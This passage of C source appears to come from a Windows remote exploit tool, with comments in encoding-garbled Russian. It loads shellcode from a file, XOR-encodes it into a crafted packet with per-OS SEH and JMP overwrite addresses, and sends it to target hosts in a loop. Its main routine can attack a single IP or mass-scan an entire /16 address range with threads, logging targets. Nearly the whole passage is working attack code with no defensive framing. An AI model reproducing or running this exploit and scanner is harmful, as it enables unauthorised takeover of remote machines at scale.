  416.      //ΓÑ»Ñα∞ ¡πª¡« ßßτ¿Γ Γ∞ ¡Ñ»«ßαÑñßΓóÑ¡¡« ¿ß»«½¡∩Ѽδ⌐ Φѽ½¬«ñ! 
  417.  
  418.      fp=fopen("bshell2","rb"); 
  419.      int sz=fread(shellcode,1,1024,fp); 
  420.      fclose(fp); 
  421. //     printf("%d\n",sz); 
  422.      for(int i=0;i<sz;i++) 
  423.           rawData[i+0x71]=shellcode; 
  424. //     fp=fopen("badfile.exe","rb"); 
  425. //     unsigned int sz1=fread(shellcode,1,50000,fp); 
  426. //     fclose(fp); 
  427. //     for(i=0;i<sz1;i++) 
  428. //          rawData[i+0x240]=shellcode; 
  429.  
  430. //     fp=fopen("pac","wb"); 
  431. //     fwrite(rawData,1,1036,fp); 
  432. //     fclose(fp); 
  433.  
  434. //     return; 
  435.  
  436.      
  437.      //ÅÑαÑñ ΓѼ ¬ ¬ ¬ß«α¿Γ∞ º »¿ΦѼ  ñαÑß ßó«í«ñ¡«ú« HEAP'a 
  438. //     DWORD heap=0x00180000; 
  439. //     int k=vers; 
  440. //     vers=1; 
  441. //     *(DWORD *)(rawData+0xae)=target_os[vers].heap; 
  442.      *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; 
  443.      //.Ñ»Ñα∞ ¡πª¡« »α«¬ß«α¿Γ∞ ¡ Φ ¬«ñ, ñ½∩ Γ«ú« τΓ«íδ »«½πτ¿Γ∞ ¡πª¡δ⌐ ¡ ¼ 
  444.      XOR(rawData,0x71,sz,0x99); 
  445. //     XOR(rawData,0x240,sz1,0x99); 
  446.      //. ¬ ªÑ ¡ ¼ ¡πª¡« º »¿ß Γ∞ ¡πª¡δ⌐ ¡ ¼ SEH ¿ JMP 
  447.      DWORD seh=target_os[vers].seh; 
  448.      DWORD jmp=target_os[vers].jmp; 
  449.      *(DWORD *)(rawData+0x22a)=jmp; 
  450.      *(DWORD *)(rawData+0x22e)=seh; 
  451. //     *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); 
  452.      *(WORD *)(rawData+0x62)=sz; 
  453.  
  454.  
  455.      memcpy(buf2,request1,sizeof(request1)); 
  456.     *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; 
  457.     *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; 
  458.     memcpy(buf2+len1,request2,sizeof(request2)); 
  459.     len1=len1+sizeof(request2); 
  460.  
  461.     memcpy(buf2+len1,rawData,sizeof(rawData)); 
  462.     len1=len1+sizeof(rawData); 
  463.  
  464.     memcpy(buf2+len1,request3,sizeof(request3)); 
  465.     len1=len1+sizeof(request3); 
  466.     memcpy(buf2+len1,request4,sizeof(request4)); 
  467.     len1=len1+sizeof(request4); 
  468.     *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; 
  469.  
  470.     *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; 
  471.     *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; 
  472.     *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; 
  473.     *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; 
  474.     *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; 
  475.     *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; 
  476.     *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; 
  477.       
  478.      closesocket(sock); 
  479.      if(atack) 
  480.      { 
  481.           sock=socket(2,1,0); 
  482.           WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); 
  483.       
  484.           if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 
  485.           { 
  486.             printf("%s - send failed %d\n",ip,WSAGetLastError()); 
  487.             return 0; 
  488.           } 
  489.           else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} 
  490.           
  491.          len=recv(sock,(char *)buf1,1000,NULL); 
  492.           bool ft=1; 
  493.           if(ft) 
  494.           { 
  495.                int i=0; 
  496.                while(1) 
  497.                { 
  498.                     if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) 
  499.                     { 
  500.                          printf("\nSend failed.Error:%d\n",WSAGetLastError()); 
  501.                          return 0; 
  502.                     } 
  503.                     else 
  504.                     { 
  505.                          printf("\r%d",++i); 
  506.                     } 
  507.                     //Sleep(1000); 
  508.                } 
  509.           } 
  510.           send(sock,(const char *)buf2,len1,0); 
  511.           closesocket(sock); 
  512.      } 
  513.      else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); 
  514. //     fp=fopen("pac","wb"); 
  515. //     fwrite(rawData,1,1036,fp); 
  516. //     fclose(fp); 
  518. unsigned long thread_count=0; 
  519. char adr[200]; 
  520.  
  521. DWORD WINAPI ThreadProc( 
  522. LPVOID lpParameter   // thread data 
  525.      thread_count++; 
  526.      attack(adr,0); 
  527.  
  528.      thread_count--; 
  529.      return 0; 
  531.  
  532. void main(int argc,char ** argv) 
  534. //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); 
  535. //return; 
  536. //HFILE hf=_lopen("asd123",0x1001); 
  537. //printf("%x",hf); 
  538. //_lclose(hf); 
  539. //return; 
  540.  
  541. WSADATA wsaData; 
  542.  
  543. int wVersionRequested; 
  544. wVersionRequested = MAKEWORD( 2, 2 ); 
  545.  
  546. int err = WSAStartup( wVersionRequested, &wsaData ); 
  547. if ( err != 0 ) { 
  548.     /* Tell the user that we could not find a usable */ 
  549.     /* WinSock DLL.                                  */ 
  550.     return; 
  552.  
  553.      if(strchr(argv[1],'.')) 
  554.      { 
  555.           attack(argv[1],1); 
  556.           Sleep(20000); 
  557.           return; 
  558.      } 
  559.      int cb=1,db=1; 
  560.      cb=atoi(argv[3]); 
  561.      db=atoi(argv[4]); 
  562.      long tm=atoi(argv[5]); 
  563.      for(int c=cb;c<255;c++) 
  564.      { 
  565.           for(int d=db;d<255;d++) 
  566.           { 
  567.                sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); 
  568.                if(thread_count>tm) while(thread_count>tm) Sleep(100); 
  569.                CreateThread(NULL,0,&ThreadProc,"",0,NULL); 
  570.                Sleep(10); 
  571.                fflush(fp1); 
  572.           } 
  573.      } 
  574.      Sleep(60000); 
  575.      fclose(fp1); 
  576.  
  577.  
  579.